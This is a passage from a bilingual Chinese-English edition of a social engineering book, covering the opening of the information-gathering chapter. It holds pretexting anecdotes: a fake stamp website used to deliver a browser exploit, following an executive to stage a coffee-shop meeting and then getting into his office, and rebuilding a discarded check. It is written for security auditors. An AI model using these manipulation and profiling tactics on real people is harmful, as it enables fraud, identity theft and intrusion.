College students in the field of security have also used the framework. The information in the framework outlines a realistic path for these vectors, or methods of attack, and enables the reader to study them in depth.

 

一般来说,这些信息还可以帮助提高你在日常生活中的沟通能力。知道如何解读面部表情或如何用问题让别人感到安心并得到积极的回应,可以提高你与家人和朋友沟通的能力。它可以帮助你成为一个好的倾听者,更能体会别人的感受。

Generally, this information can also help enhance your ability to communicate in everyday life. Knowing how to read facial expressions or how to use questions to put people at ease and elicit positive responses can enhance your ability to communicate with your family and friends. It can assist you in becoming a good listener and more aware of people’s feelings.

 

能够读懂别人的肢体语言、面部表情和语调也能提高你成为有效沟通者的能力。了解如何保护自己和亲人只会让你更有价值,也更了解周围的世界。

Being able to read people’s body language, facial expressions, and vocal tones can also enhance your ability to be an effective communicator. Understanding how to protect yourself and your loved ones will only make you more valuable and more aware of the world around you.

 

概括

Summary

 

和任何书一样,本书所包含的知识只有付诸实践才有用。练习得越多,你就越能掌握这些技能。

Like any book, the knowledge contained herein is only useful if you put it into practice. The more you practice the more you will succeed at mastering these skills.

 

之前,我曾讨论过社交工程就像掌握烹饪艺​​术。通过以适当的数量混合正确的配料,你可以做出一顿美味可口的饭菜。第一次尝试做饭时,可能会加太多盐,也可能完全没有味道,但你不会立即放弃——你会不断尝试,直到成功。社交工程也是如此。一些必要的技能可能对你来说更自然,而其他技能可能更难掌握。

Previously, I discussed how social engineering is like mastering the art of cooking. By mixing the right ingredients in the right quantity you can have a meal that is full of flavor and excitement. The first time you try to cook a meal it might have too much salt or it might lack flavor altogether, but you don’t immediately throw in the towel—you keep trying until you get it right. The same goes for social engineering. Some of the necessary skills may come more naturally to you and others may be more difficult.

 

如果某个主题很难理解或难以掌握,请不要放弃,也不要认为你无法学习它。任何人只要付出适当的努力和努力,都可以学习和使用这些技能。

If a particular topic is hard to understand or difficult for you to grasp, do not give up, and do not assume you cannot learn it. Anyone can learn and use these skills with the right amount of effort and work.

 

还要记住,就像真正的食谱一样,一个好的社会工程学项目需要很多“配料”。当你深入了解之后,第一个配料可能更有意义。某些技能——例如第 5 章中介绍的“人为缓冲区溢出”——只有在你掌握本书中讨论的其他一些技能后才会有意义。

Also keep in mind that, just like a real recipe, many “ingredients” go into a good social engineering gig. The first ingredient might make more sense after you get down the line a little more. Certain skills—such as “the human buffer overflow” covered in Chapter 5—will only make sense after you master some of the other skills discussed in this book.

 

无论如何,请继续练习,并确保对需要明确的问题进行额外研究。现在让我们开始烹饪。您的“食谱”从下一章开始,第一个原料是信息收集。

Regardless, keep practicing and make sure to do extra research on topics for which you need clarity. Now let’s start cooking. Your “recipe” starts in the next chapter with the first ingredient, information gathering.

 

第2章

Chapter 2

 

信息收集

Information Gathering

 

战争百分之九十是信息。

War is ninety percent information.

 

-拿破仑·波拿巴

—Napoleon Bonaparte

 

有人说,没有信息是无关紧要的。这句话在谈到信息收集这一章时非常正确。即使是最细微的细节也可能导致成功的社会工程学攻击。

It has been said that no information is irrelevant. Those words ring true when it comes to this chapter on information gathering. Even the slightest detail can lead to a successful social engineering breach.

 

我的好友兼导师 Mati Aharoni 是一名拥有十多年经验的专业渗透测试人员,他讲的故事非常能说明这一点。他被委以重任,要进入一家在网络上几乎不存在任何踪迹的公司。由于该公司提供的入侵途径很少,因此要获得这种访问权限非常困难。

My good friend and mentor, Mati Aharoni, who has been a professional pentester for more than a decade, tells a story that really drives this point home. He was tasked with gaining access to a company that had an almost nonexistent footprint on the Web. Because the company offered very few avenues to hack into, gaining this access would prove to be very challenging.

 

Mati 开始在互联网上搜索任何可能找到线索的细节。在一次搜索中,他发现一位公司高级官员在一个集邮论坛上使用公司电子邮件,并表示对 20 世纪 50 年代的邮票很感兴趣。Mati 很快注册了一个 URL,类似于www.stampcollection.com,然后在 Google 上找到了一堆看起来很旧的 1950 年邮票图片。他快速创建了一个网站来展示他的“邮票收藏”,然后撰写了一封电子邮件给公司官员:

Mati began scouring the Internet for any details that could lead to a path in. In one of his searches he found a high-ranking company official who used his corporate email on a forum about stamp collecting and who expressed an interest in stamps from the 1950s. Mati quickly registered a URL, something like www.stampcollection.com, and then found a bunch of old-looking 1950 stamp pictures on Google. Creating a quick website to show his “stamp collection,” he then crafted an email to the company official:

 

尊敬的先生,

Dear Sir,

 

我在www.forum.com上看到您对 20 世纪 50 年代的邮票感兴趣。最近我的祖父去世了,给我留下了一些邮票收藏,我想出售。我建立了一个网站;如果您想查看,请访问www.stampcollection.com

I saw on www.forum.com you are interested in stamps from the 1950s. Recently my grandfather passed away and left me with a stamp collection that I would like to sell. I have a website set up; if you would like to see it please visit www.stampcollection.com.

 

谢谢,

Thanks,

 

马蒂

Mati

 

在将电子邮件发送给目标之前,他想确保产生最大影响。他从论坛帖子中获取了办公室电话号码,并给该男子打电话。“早上好,先生,我是鲍勃。我在www.forum.com上看到了您的帖子。我祖父最近去世了,他给我留下了一堆 20 世纪 50 年代和 60 年代的邮票。我拍了照片并做了一个网站。如果您有兴趣,我可以向您发送链接,您可以看看。”

Before he sent the email to the target, he wanted to ensure there would be maximum impact. He took the office number from the forum post and placed a phone call to the man. “Good morning, sir, this is Bob. I saw your posting on www.forum.com. My grandfather recently passed and he left me a bunch of stamps from the 1950s and 60s. I took pictures and made a website. If you are interested I can send you the link and you can take a look.”

 

目标非常渴望看到这些收藏,并欣然接受了电子邮件。Mati 向该男子发送电子邮件,等待他点击链接。Mati 所做的就是在网站上嵌入一个恶意框架。该框架中的代码会利用当时流行的 Internet Explorer 浏览器中已知的漏洞,并将目标计算机的控制权交给 Mati。

The target was very eager to see this collection and readily accepted the email. Mati sent the man the email and waited for him to click the link. What Mati did was embed a malicious frame on the website. This frame had code in it that would exploit a vulnerability then known in the popular Internet Explorer browser and give control over the target’s computer to Mati.

 

等待的时间并不长:该男子收到电子邮件后立即点击了链接,公司的周边系统就被攻破了。

The wait was not long: as soon as the man received the email he clicked the link and the company’s perimeter was compromised.

 

一条小小的信息——这个人用来寻找邮票的公司电子邮件——导致了这次入侵。没有一条信息是无关紧要的。考虑到这一点,以下是与信息收集有关的问题:

A tiny piece of information—the corporate email this man used to look for stamps—is what led to this compromise. No piece of information is irrelevant. With that knowledge in mind, here are questions that come up with regard to information gathering:

 
 
     
  • 你如何收集信息?
  • How can you gather information?
  •  
     
  • 社会工程师可以通过哪些来源收集信息?
  • What sources exist for social engineers to gather information?
  •  
     
  • 您可以从这些信息中获取哪些信息来描述您的目标?
  • What can you glean from this information to profile your targets?
  •  
     
  • 如何定位、存储和分类所有这些信息以便于使用?
  • How can you locate, store, and catalog all this information for the easiest level of use?
  •  
 

这些只是您需要找到答案以完成正确和有效的信息收集的几个问题。随着社交网站的大量出现,人们可以轻松地与任何他们选择的人分享他们生活的方方面面,这使得潜在的破坏性信息比以往任何时候都更容易获得。本章重点介绍信息收集的原理,并介绍如何在社会工程中使用信息以及人们在网络上发布的某些信息可能对其个人和企业安全造成的破坏性影响的示例。

These are just a few of the questions that you will need to find answers for in order to accomplish proper and effective information gathering. With the plethora of social networking sites out there, people can easily share every aspect of their lives with anyone they choose, making potentially damaging information more readily available than ever before. This chapter focuses on the principles of information gathering by presenting examples of how it can be used in social engineering and the devastating effects some of the information people release on the Web can have on their personal and business security.

 

社会工程师可能使用的许多技能或方法都来自其他领域。销售是收集信息能力最强的一个领域。销售人员往往非常健谈、随和,并且非常善于收集与其互动的人的数据。

Many of the skills or methods that a social engineer may use come from other fields. One field that is superb at gathering information is sales. Salespeople tend to be very talkative, easygoing, and very good at collecting data about those with whom they interact.

 

我曾经读过一本关于销售的书,书中作者鼓励销售人员从买家那里收集推荐,大致是这样的:“你能告诉我一个你认为能从这个产品中受益的人吗?”

I once read a book on sales in which the author encouraged salespeople to gather referrals from the buyer—something along these lines: “Can you tell me one person who you think could benefit from this product as much as you will?”

 

使用简单的措辞可以让一个人敞开心扉,向家人、朋友甚至同事推荐。收集或收集这些信息然后存储起来,可以让销售人员获得他们所谓的“热线索”。热线索是指他们拥有“内幕”的人,这是一种无需主动打电话就能进入门的方式。

Using simple wording can get a person to open up and refer family, friends, and maybe even coworkers. Harvesting, or gathering this information and then storing it, allows the sales people to have what they call “warm leads” to call on. A warm lead is where they have a person with an “in,” a way to get in the door without having to cold call.

 

销售人员现在可以致电这些推荐人,并说这样的话:“我刚刚去了隔壁 Jane 家,她购买了我们的高级保单。在查看了福利并预付了一年的费用后,她说您可能会享受相同的保险。您有时间让我向您展示 Jane 购买了什么吗?”

The salesperson can now call on those referrals and say something like, “I was just at Jane’s house two doors down, and she bought our premium policy. After reviewing the benefits and paying for the year upfront she said you might benefit from the same coverage. Do you have a minute for me to show you what Jane purchased?”

 

销售人员使用的这些技巧经常被社会工程师效仿。当然,社会工程师并不是在寻求推荐,但请考虑一下这次对话中的信息流。销售人员从现有客户那里收集信息,然后以一种让新“目标”更容易倾听和接受的方式传递这些信息。此外,通过暗示第一位客户购买了什么,并使用“高级”和“提前”等词语,销售人员正在向新目标预先灌输他想在短时间内对他使用的关键词。这种技术非常有效,因为它可以建立信任,利用熟悉感,让目标对销售人员或社会工程师感到满意,为他们在思想上架起一座桥梁,以弥合通常存在的鸿沟。本章以及下一章将深入探讨这些主题。

These skills used by salespeople are often mirrored by social engineers. Of course a social engineer is not asking for referrals, but think about the flow of information in and out of this conversation. The salesperson gathers information from his present client, then he relays that information in a way that will make the new “target” more susceptible to listen and let him in. In addition, by dropping hints on what the first customer bought and using words like “premium” and “in advance” the salesperson is preloading the new target with the keywords he wants to use on him in just a little while. This technique is effective in that it builds trust, uses familiarity, and allows the target to feel comfortable with the salesperson, or the social engineer, giving their mind a bridge over the gap that normally would exist there. This chapter, as well as the following chapter, will delve deep into these topics.

 

作为一名社会工程师,理解并有效运用这两个角度都至关重要。回到第 1 章中关于厨师的例子,一名优秀的厨师深谙如何识别优质产品、新鲜蔬菜和优质肉类。他们了解菜谱中需要什么,但除非使用正确的用量,否则食物可能会太淡或太浓或根本不好吃。仅仅知道菜谱需要加盐并不能使您成为厨师,但知道如何混合正确数量和类型的配料可以帮助您掌握烹饪艺​​术。社会工程师需要掌握要使用的技能类型和数量(“菜谱”)。做到了这一点,他们就可以成为一名社会工程师大师。

As a social engineer, both angles are of vital importance to understand and then to use effectively. To return to the illustration used in Chapter 1 of being a chef, a good chef knows all about how to spot good quality products, fresh vegetables, and quality meats. They are knowledgeable about what goes into the recipe, but unless the right quantities are used the food may be too bland or too strong or not good enough to eat at all. Simply knowing that a recipe calls for salt doesn’t make you a chef, but knowing how to mix the right amount and types of ingredients can help you master the art of cooking. A social engineer needs to master the type and quantity of skills to be used (the “recipe”). When that is done they can become a master social engineer.

 

本章将帮助您找到这种平衡。任何社会工程师的秘诀中,第一个要素就是信息(下一节将详细介绍)。信息质量越高,您就越有可能取得成功。本章首先讨论如何收集信息。然后讨论可以使用哪些来源来收集信息。如果不讨论如何将所有这些资源结合在一起并利用这些资源作为社会工程师,本章将是不完整的。

This chapter helps identify this balance. The first ingredient in any recipe for a social engineer is information (detailed in the next section). The higher the quality of the information the more likely you are to achieve success. This chapter begins by discussing how to gather information. Then it moves on to discuss what sources can be used to harvest information. This chapter would not be complete without discussing how to tie it all together and utilize these resources as a social engineer.

 

收集信息

Gathering Information

 

收集信息就像盖房子。如果你试图从屋顶开始,你的房子肯定会失败。一栋好房子需要有坚实的地基,然后从头开始建造。当你收集信息时,你可能会不知所措,不知道如何组织和使用这些数据,所以创建一个文件或一个信息收集服务来收集这些数据是一个好主意。

Gathering information is like building a house. If you try to start with the roof your house will surely be a failure. A good house will be built using a solid foundation and from there it will be built literally from the ground up. As you gather information you may be overwhelmed with how to organize and then use this data, so starting a file or an information gathering service to gather this data in is a good idea.

 

有许多工具可以帮助收集和使用这些数据。对于渗透测试和社会工程审计,我使用专门为此设计的 Linux 发行版 BackTrack。BackTrack 与大多数 Linux 发行版一样,都是免费和开源的。它最大的优点可能是包含 300 多种旨在协助安全审计的工具。

Many tools exist to assist in collecting and then using this data. For penetration tests and social engineering audits I use a Linux distribution called BackTrack that is specifically designed for this purpose. BackTrack is like most Linux distributions in that it is free and open source. Perhaps its greatest asset is that it contains more than 300 tools designed to assist in security auditing.

 

BackTrack 中的所有工具都是开源且免费的。BackTrack 工具的高质量尤其引人注目,其中许多工具可以与价格昂贵的工具相媲美,甚至超越它们。两个特别适用于信息收集和存储的 BackTrack 工具是 Dradis 和 BasKet。以下部分将简要介绍这两个工具。

All of the tools within BackTrack are also open source and free. Especially attractive is the high quality of BackTrack’s tools, many of which rival and even surpass tools you would pay an arm and a leg for. Two BackTrack tools that are particularly useful for information gathering and storing are called Dradis and BasKet. The following sections take a quick look at each.

 

使用 BasKet

Using BasKet

 

BasKet 的功能与 Notepad 类似,但更像 Notepad 的增强版。它目前由 Kelvie Wong 维护,可在 BackTrack 或http://basket.kde.org/上免费获取。该网站有关于如何安装 BasKet 的完整说明。安装后,BasKet 易于使用,界面也不难理解。

BasKet is similar in functionality to Notepad, but more like Notepad on steroids. It is presently maintained by Kelvie Wong and can be found for free either in BackTrack or at http://basket.kde.org/. The website has full instructions for how to install BasKet. Once installed BasKet is easy to use and the interface is not difficult to understand.

 

如图2-1所示,界面非常直观。添加新的“购物篮”来保存数据非常简单,只需在屏幕左侧单击鼠标右键,然后选择“新建购物篮”即可。

As seen in Figure 2-1, the interface is easy to figure out. Adding a new “Basket” to hold data is as simple as right clicking on the left side of the screen and selecting New Basket.

 

一旦添加了新的 Baskets,一切就都变得没有限制了。您可以复制和粘贴数据、将屏幕截图放入 Baskets,甚至可以绑定 OpenOffice 或其他类型的图表、图形和其他实用程序。

Once new Baskets are added the sky is the limit. You can copy and paste data, place screen shots in the Basket, or even tie in OpenOffice or other types of charts, graphs, and other utilities.

 

图 2-1: BasKet 可以轻松组织信息收集过程中发现的数据。

Figure 2-1: BasKet allows for easy organization of the data found during information gathering.

 
f0201.tif
 

添加屏幕截图有几种方法。最简单的方法是复制图像,然后右键单击新的 Basket,然后单击“粘贴”。如图2-1所示,添加图像很简单,但也会立即显示图像。只需单击 Basket 并开始输入,即可在图像周围输入或粘贴注释。

Adding a screenshot can be done in a few ways. The easiest is to copy the image then right mouse click on the new Basket and click Paste. As shown in Figure 2-1, adding images is simple but also shows the image right away. Notes can be typed or pasted around the images by simply clicking in the Basket and starting to type.

 

在正常的安全审计中,BasKet 的吸引力在于它对数据进行分类并在屏幕上显示数据的方式。我通常会为每种类型的数据(例如 Whois、社交媒体等)添加不同的 Basket。之后,我将使用 Google 地图或 Google Earth 进行一些侦察,以捕获客户建筑物或设施的一些图像,我也可以将它们存储在 BasKet 中。审计完成后,能够快速提取和利用这些信息非常容易。图 2-2展示了一个几乎完整的 BasKet,其中包含大量有用的信息和选项卡。

In a normal security audit, what makes BasKet attractive is the way it catalogs data and shows it on the screen. I usually add a different Basket for each type of data such as Whois, social media, and so on. After that, I will do some recon using Google Maps or Google Earth to capture some images of the client’s building or facility, which I can store in BasKet as well. When the audit is complete, being able to pull up and utilize this information quickly is very easy. Figure 2-2 illustrates a nearly complete BasKet that contains a lot of useful information and tabs.

 

如图2-2所示,BasKet 很容易以易于阅读的格式存储信息。我尝试包含尽可能多的信息,因为没有信息太小而无法存储。我包含的信息是来自客户网站的项目、WhoIs 信息、社交媒体网站、图像、员工联系信息、找到的简历、论坛、爱好以及我发现的与公司相关的任何其他信息。

As shown in Figure 2-2, BasKet is easy to store the information in an easy-to-read format. I try to include as much information as possible because no information is too small to store. The information I include is items from the client’s website, WhoIs information, social media sites, images, employee contact info, resumes found, forums, hobbies, and anything else I find linked to the company.

 

图 2-2:一个几乎完成的 BasKet,包含大量有用的信息。

Figure 2-2: A nearly completed BasKet with lots of useful information.

 
f0202.tif
 

完成后,我只需点击菜单 Basket,然后点击 Export,即可将整个 BasKet 导出为 HTML 页面。这对于报告或共享这些数据非常有用。

When I am done, I simply click on the menu called Basket then Export and export the whole BasKet as an HTML page. This is great for reporting or sharing this data.

 

对于社会工程师来说,收集数据(后面会详细讨论)是每项工作的关键,但如果不能快速回忆和利用数据,数据就毫无用处。BasKet 这样的工具让保留和利用数据变得容易。如果你尝试使用 BasKet,你就会上瘾。

For a social engineer, collecting data, as will be discussed in detail later, is the crux of every gig, but if you cannot recall and utilize the data quickly, it becomes useless. A tool like BasKet makes retaining and utilizing data easy. If you give BasKet a try and use it once, you will be hooked.

 

使用 Dradis

Using Dradis

 

尽管 BasKet 是一款出色的工具,但如果您进行大量信息收集,或者您所在的团队需要收集、存储和利用数据,那么允许多用户共享这些数据的工具就很重要。Dradis 就是一个不错的选择。根据开源 Dradis 的创建者的说法,该程序是一个“独立的 Web 应用程序,可提供您收集的信息的集中存储库”,以及规划未来发展的一种方式。

Although BasKet is a great tool, if you do a lot of information gathering, or if you work on team that needs to collect, store, and utilize data, then a tool that allows for multi-user sharing of this data is important. Enter Dradis. According to the creators of the open-source Dradis, the program is a “self-contained web application that provides a centralized repository of information” you have gathered, and a means by which to plan for what’s to come.

 

与 BasKet 一样,Dradis 是一款免费的开源工具,可在http://dradisframework.org/上找到。无论您使用的是 Linux、Windows 还是 Mac,Dradis 都有易于使用的设置和安装说明,可在http://dradisframework.org/install.html上找到。

Like BasKet, Dradis is a free, open-source tool that can be found at http://dradisframework.org/. Whether you are using Linux, Windows, or a Mac, Dradis has easy-to-use set up and installation instructions found at http://dradisframework.org/install.html.

 

安装并设置 Dradis 后,您只需浏览到您分配的本地主机和端口,或使用标准 3004。您可以通过打开浏览器并输入https://localhost:3004/来执行此操作。

Once Dradis is installed and set up, you simply browse to the localhost and port you assigned, or use the standard 3004. You can do this by opening a browser and typing https://localhost:3004/.

 

登录后,您将看到如图 2-3所示的屏幕。请注意左上角的“添加分支”按钮。添加分支允许您添加与 BasKet 中类似的详细信息:注释、图像等,您甚至可以导入注释。

Once logged in, you’re greeted with the screen shown in Figure 2-3. Notice the Add Branch button at the top left. Adding a branch allows you to add similar details as you can in BasKet: notes, images, and more, and you can even import notes.

 

图 2-3: Dradis 具有美观且易于使用的界面。

Figure 2-3: Dradis has a nice, easy-to-use interface.

 
f0203.tif
 

Dradis 和 BasKet 只是我用来收集和存储数据的两个工具。Dradis 和 BasKet 的网站上都有关于如何设置和使用这些强大工具的非常好的教程。

Dradis and BasKet are just two tools that I have used to collect and store data. The websites for both Dradis and BasKet have very nice tutorials on setting up and using these powerful tools.

 

无论您使用哪种操作系统(Mac、Windows 或 Linux),都有适合您的选择。重要的是使用您熟悉且可以处理大量数据的工具。

Whatever operating system you use—Mac, Windows, or Linux—there are choices out there for you. What is important is to use a tool that you are comfortable with and that can handle large amounts of data.

 

因此,我建议远离 Windows 中的记事本或 Mac 中的 Smultron 或 TextEdit 之类的东西。您希望能够格式化和突出显示某些区域以使其脱颖而出。在我的 Dradis 服务器中(如图2-3所示),我有一个电话脚本部分。此功能对于转录可能基于我收集的信息而起作用的想法非常方便。

For that reason I suggest staying away from things like Notepad in Windows or Smultron or TextEdit in Mac. You want to be able to format and highlight certain areas to make them stand out. In my Dradis server, pictured in Figure 2-3, I have a section for phone scripts. This functionality is handy for transcribing ideas that might work based on the information I gathered.

 

这些工具表明了社会工程师如何开始利用他所收集的信息。利用所收集信息的第一步是像社会工程师一样思考。

These tools suggest how a social engineer begins to utilize the information he collects. The first stage in utilizing the information you gather is thinking like a social engineer.

 

像社会工程师一样思考

Thinking Like a Social Engineer

 

拥有几百兆的数据和图片固然很好,但是当你开始查看这些数据时,如何训练自己进行查看,然后以最具影响力的方式思考这些数据呢?

Having a few hundred megabytes of data and pictures is great, but when you start reviewing it, how do you train yourself to review and then think of the data in a way that has maximum impact?

 

当然,您可以打开浏览器,输入冗长的随机搜索,这些搜索可能会带来某种形式的信息,其中一些甚至可能是有用的。如果您饿了,您可能不会只是跑到厨房,开始将您看到的任何食材扔进碗里,然后开始大快朵颐。计划、准备和思考都会让这顿饭变得美味。与真正的饭菜类似,社会工程师需要计划、准备和思考他将尝试获取哪些信息以及如何获取这些信息。

Of course you could just open a browser and type in long-winded random searches that may lead to some form of information, some of which may even be useful. If you are hungry you probably don’t just run to the kitchen and start to throw whatever ingredients you see into a bowl and start digging in. Planning, preparation, and thought all cause the meal to be good. Similar to a real meal, a social engineer needs to plan, prepare, and think about what information he will try to obtain and how he will obtain it.

 

当谈到信息收集这一重要步骤时,许多人必须改变思维方式。你必须以不同于平常的观点和思维方式来处理眼前的信息世界。你必须学会​​质疑一切,当你看到一条信息时,学会像社会工程师一样思考它。你向网络或其他来源提出问题的方式必须改变。你看待答案的方式也必须改变。偷听对话、阅读看似毫无意义的论坛帖子、看到一袋垃圾——你应该以不同于以前的方式吸收这些信息。我的导师 Mati 看到程序崩溃时会很兴奋。为什么?因为他是一名渗透测试员和漏洞利用编写者。崩溃是发现软件漏洞的第一步,所以他不会因为丢失数据而恼火,而是为崩溃而兴奋。社会工程师必须以同样的方式处理信息。当找到使用许多不同社交媒体网站的目标时,寻找它们之间的联系以及可以创建整个个人资料的信息。

When it comes to this vital step of information gathering many people will have to change the way they think. You have to approach the world of information in front of you with a different opinion and mindset than what you normally may have. You have to learn to question everything, and, when you see a piece of information, learn to think of it as a social engineer would. The way you ask questions of the web or other sources must change. The way you view the answers that come back must also change. Overhearing a conversation, reading what seems like a meaningless forum post, seeing a bag of trash—you should assimilate this information in a different way than you did before. My mentor Mati gets excited when he sees a program crash. Why? Because he is a penetration tester and exploit writer. A crash is the first step to finding a vulnerability in software, so instead of being irritated at losing data he gets excited at the crash. A social engineer must approach information in much the same way. When finding a target that utilizes many different social media sites, look for the links between them and the information that can create a whole profile.

 

例如,有一次我租了一辆车,开车去几个州出差。我和同伴把所有行李都装在后备箱里;当我们上车时,我们注意到后座上有一小袋垃圾。另一个人说了这样的话:“今天的服务太糟糕了。你想想,就你付的钱来说,他们至少会把车打扫干净。”

As an example, one time I rented a car to drive a few states away for business. My companion and I loaded all of our luggage in the trunk; as we were entering the car we noticed a small bag of trash in the back seat. The other person said something like, “Service today just stinks. You figure for what you pay they would at least clean out the car.”

 

没错,你会预料到这一点,但我阻止了将那袋食物扔进最近的罐头里,我说:“让我快速看一下。”当我打开袋子并推开塔可钟包装纸时,眼前的东西让我大吃一惊——半张撕碎的支票。我迅速倒出袋子,找到了一张银行收据和另一半支票。支票上写着几千美元,然后被撕碎——不是撕成小块,而是撕成四大块,然后扔进一个带有塔可钟包装纸的小袋子里。用胶带把它粘在一起,露出了这个人的姓名、公司名称、地址、电话号码、银行账号和银行路由号码。加上银行收据,我现在有了他的账户余额。值得庆幸的是,我不是恶意的人,因为只需再进行几步就可以实施身份盗窃。

True, you would expect that, but I stopped that bag from just being chucked into the nearest can, and I said, “Let me just look at that really quick.” As I opened the bag and pushed aside the Taco Bell wrappers, what was lying in plain sight was a shock to me—half of a ripped-up check. I quickly dumped out the bag and found a bank receipt and the other half of the check. The check was written out for a couple thousand dollars, then just ripped up—not into tiny little pieces, but just into four large chunks, then thrown into a small bag with a Taco Bell wrapper. Taping it back together revealed this person’s name, company name, address, phone number, bank account number, and bank routing number. Together with the bank receipt I now had the balance of his account. Thankfully for him I am not a malicious person because only a couple more steps are needed to commit identity theft.

 

这个故事体现了人们如何看待自己宝贵的信息。这个家伙在我之前租了车,然后因为他扔掉了支票,他觉得支票已经没了,被安全地处理掉了。或者他是这么认为的;但这并不是一个孤立的案例。在这个 URL 上,你可以找到一个最近的故事,关于人们扔掉或在车库拍卖会上以几乎一文不值的价钱卖掉的非常有价值的东西:www.social-engineer.org/wiki/archives/BlogPosts/LookWhatIFound.html

This story personifies how people view their valuable information. This guy rented the car before me and then because he threw the check away he felt it was gone, disposed of safely. Or so he thought; but this is not an isolated case. At this URL you can find a recent story about very valuable things people just threw away or sold for next to nothing at a garage sale: www.social-engineer.org/wiki/archives/BlogPosts/LookWhatIFound.html.

 

像:

Things like:

 
 
     
  • 博物馆以 120 万美元购得的一幅画
  • A painting that a museum bought for $1.2 million
  •  
     
  • 行驶里程仅 24,000 英里的 1937 年布加迪 Type 57S Atalante 以 300 万美元的价格售出
  • 1937 Bugatti Type 57S Atalante with a mere 24,000 miles sold for $3 million
  •  
     
  • 《独立宣言》副本
  • A copy of the Declaration of Independence
  •  
 

如果人们扔掉一幅其中藏有《独立宣言》的画作,那么扔掉账单、医疗记录、旧发票或信用卡账单可能就不是什么大不了的事了。

If people throw away a painting with a hidden copy of the Declaration of Independence in it, then throwing away bills, medical records, old invoices, or credit card statements probably isn’t such a huge deal.

 

你在公共场合与人交往的方式可能会产生毁灭性的影响。在以下场景中,我被要求审计一家公司,在继续之前我需要收集一些数据。看看这些看似毫无意义的简单信息是如何导致违规的。

How you interact with people in public can have devastating effects. In the following scenario I was asked to audit a company and before I could proceed I needed to gather some data. Take a look at how simple, seemingly meaningless information can lead to a breach.

 

只要跟踪目标公司的一位高层一两天,我就会发现他每天早上都会在同一时间停下来喝咖啡。因为我知道他早上 7:30 在当地的咖啡店喝咖啡,所以我可以安排一次“会面”。他会坐 30-35 分钟,看报纸,喝一杯中杯拿铁。我比他坐下大约 3-5 分钟后进入咖啡店。我和他点了同样的饮料,坐在他旁边。我看着他把报纸的一页放下,问我是否可以读他读完的那一页。我在路上已经拿起了一份报纸,我知道第三页有一篇关于该地区最近发生的一起谋杀案的文章。我假装刚刚读过,然后大声说:“即使是在这些小镇,现在的情况也很可怕。你住在这附近吗?”

Simply following one of the higher ups of the target company for a day or two showed me that he stopped for coffee every morning at the same time. Since I was aware of his 7:30 a.m. coffee stop at the local coffee shop I could plan a “meeting.” He would sit for 30–35 minutes, read the paper, and drink a medium cafe latte. I enter the shop about 3–5 minutes after he sits down. I order the same drink as him and sit down next to him in the shop. I look over as he places one section of the paper down and ask whether I can read the paper he is done with. Having already picked up a paper on the way I knew that page three contained an article about a recent murder in the area. After acting as if I just read it, I say out loud, “Even in these small towns things are scary nowadays. You live around here?”

 

现在,目标客户可能会拒绝我,或者如果我打得好,我的肢体语言、语调和外表会让他感到安心。他说:“是的,几年前我为了工作搬到了这里。我喜欢小城镇,但你越来越常听到这种说法了。”

Now at this point the target can blow me off, or if I played my cards right, my body language, vocal tone, and appearance will put him at ease. He says, “Yeah, I moved in a few years back for a job. I like small towns, but you hear this more and more.”

 

我继续说:“我只是路过这个地区。我向大公司出售高端商业咨询服务,并且一直喜欢在小城镇旅行,但我似乎听到越来越多的此类故事,即使是在农村地区。”然后我以一种非常开玩笑的语气说:“你不会是大公司的大人物,需要一些咨询吧?”

I continue, “I am just traveling through the area. I sell high-end business consulting services to large companies and always enjoy traveling through the smaller towns but I seem to hear more and more of these stories even in the rural areas.” Then in a very joking tone I say, “You don’t happen to be a bigwig in a large company that needs some consulting do you?”

 

他一笑置之,然后就像我在向他发起挑战,要他证明自己的价值一样说道:“我是当地 XYZ 公司的财务副总裁,但我不负责那个部门。”

He laughs it off and then as if I just challenged him to prove his worth says, “Well I am a VP of finance at XYZ Corp. here locally, but I don’t handle that department.”

 

“嘿,听着,我不是想向你推销什么,只是想喝杯咖啡,但你觉得我是否可以在明天或星期三过来给你留点信息?”

“Hey, look, I am not trying to sell you something, just enjoy coffee, but if you think I can stop by and leave you some information tomorrow or Wednesday?”

 

故事从这里开始变得有趣起来,他说:“好吧,我会的,但我周三要出去度一个急需的假。不过你为什么不把它寄给我,我会给你打电话。”然后他递给我一张卡片。

This is where the story gets interesting, as he says, “Well I would but I am heading out for a much-needed vacation on Wednesday. But why don’t you mail it to me and I will call you.” He then hands me a card.

 

“我希望去一个温暖而阳光明媚的地方?”我问这个问题,知道我可能已经接近需要结束谈话的地步了。

“Going somewhere warm and sunny, I hope?” I ask this knowing that I am probably getting close to my point where I need to cut it off.

 

“带着妻子去南方乘船游览。”我看得出他不想告诉我去哪里,这也无妨,所以我们握手言和,然后分手。

“Taking the wife on a cruise south.” I can tell he doesn’t want to tell me where, which is fine, so we shake hands and part ways.

 

现在他是不是要把我甩了?很有可能,但我有一些有价值的信息:

Now could he have been blowing me off? Probably, but I have some valuable information:

 
 
     
  • 他的直线号码
  • His direct number
  •  
     
  • 当他要去度假的时候
  • When he is leaving for vacation
  •  
     
  • 什么类型的假期
  • What type of vacation
  •  
     
  • 他是当地人
  • That he is local
  •  
     
  • 他公司的名字
  • The name of his company
  •  
     
  • 他在公司的头衔
  • His title in his company
  •  
     
  • 他最近搬家了
  • That he recently relocated
  •  
 

当然,其中一些信息是我之前收集的,但在这次会面后,我又补充了大量信息。现在,为了发起下一步攻击,我打电话给他的直线电话,希望他能和他见面,但他的接线员却说:“对不起,史密斯先生正在度假——我可以留言吗?”

Of course, some of this information I already had from previous information gathering, but I was able to add a substantial amount to it after this meeting. Now to launch the next part of the attack, I call his direct line the day after he is supposed to be gone and ask for him, only to be told by his receptionist, “Sorry, Mr. Smith is on vacation—can I take a message?”

 

太棒了。信息已核实,现在我只需启动最后阶段,这意味着穿上西装,拿着价值 9 美元的名片去他的办公室。我进去,签到,告诉接待员我和史密斯先生约好了上午 10:00 见面,她回答说:“他正在度假,你确定是今天吗?”

Excellent. The information is verified and now all I need to do is launch the final phase, which means dressing up in a suit and taking my $9 business cards to his office. I enter, sign in, and tell the receptionist I have an appointment with Mr. Smith at 10:00 a.m. To which she replies, “He is on vacation, are you sure it is today?”

 

通过练习微表情(第 5 章中讨论的主题),我表现出了真正的惊讶:“等等,他的巡航是这周吗?我以为他下周就出发了。”

Using my practice sessions on microexpressions, a topic addressed in Chapter 5, I show true surprise: “Wait, his cruise was this week? I thought he left next week.”

 

现在这句话至关重要——为什么?

Now this statement is vital—why?

 

